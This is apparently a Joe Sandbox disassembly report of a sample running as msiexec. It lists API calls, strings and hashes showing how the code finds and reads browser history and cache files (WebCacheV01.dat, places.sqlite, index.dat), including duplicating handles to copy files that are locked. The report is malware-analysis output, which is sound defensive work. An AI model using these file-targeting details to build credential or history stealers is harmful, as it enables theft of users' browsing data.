                                                                                                                                                      • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                      APIs
                                                                                                                                                      • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcmp
                                                                                                                                                      • String ID: @ $SQLite format 3
                                                                                                                                                      • API String ID: 1475443563-3708268960
                                                                                                                                                      • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                      • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmpqsort
                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                      • API String ID: 1579243037-1578091866
                                                                                                                                                      • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                      • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040E60F
                                                                                                                                                      • memset.MSVCRT ref: 0040E629
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                      Strings
                                                                                                                                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                      • API String ID: 3354267031-2114579845
                                                                                                                                                      • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                      • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset
                                                                                                                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                      • API String ID: 2221118986-1725073988
                                                                                                                                                      • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                      • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                      • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$memcmp
                                                                                                                                                      • String ID: $$8
                                                                                                                                                      • API String ID: 2808797137-435121686
                                                                                                                                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                        • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                      • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1979745280-0
                                                                                                                                                      • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                      • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                      • memset.MSVCRT ref: 00414C87
                                                                                                                                                      • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                      Strings
                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProcVersionmemsetwcscpy
                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                      • API String ID: 4182280571-2036018995
                                                                                                                                                      • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                      • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                      • memset.MSVCRT ref: 00403A55
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                      • String ID: history.dat$places.sqlite
                                                                                                                                                      • API String ID: 2641622041-467022611
                                                                                                                                                      • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                                                                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                      • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                                                                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$File$PointerRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 839530781-0
                                                                                                                                                      • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                      • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                      • String ID: *.*$index.dat
                                                                                                                                                      • API String ID: 1974802433-2863569691
                                                                                                                                                      • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                      • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1156039329-0
                                                                                                                                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3397143404-0
                                                                                                                                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                      APIs
                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1125800050-0
                                                                                                                                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                      APIs
                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                      • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandleSleep
                                                                                                                                                      • String ID: }A
                                                                                                                                                      • API String ID: 252777609-2138825249
                                                                                                                                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                      APIs
                                                                                                                                                      • malloc.MSVCRT ref: 00409A10
                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                      • free.MSVCRT ref: 00409A31
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: freemallocmemcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3056473165-0
                                                                                                                                                      • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                      • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: d
                                                                                                                                                      • API String ID: 0-2564639436
                                                                                                                                                      • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                      • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset
                                                                                                                                                      • String ID: BINARY
                                                                                                                                                      • API String ID: 2221118986-907554435
                                                                                                                                                      • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                      • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                      • String ID: /stext
                                                                                                                                                      • API String ID: 2081463915-3817206916
                                                                                                                                                      • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                      • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                      • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2445788494-0
                                                                                                                                                      • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
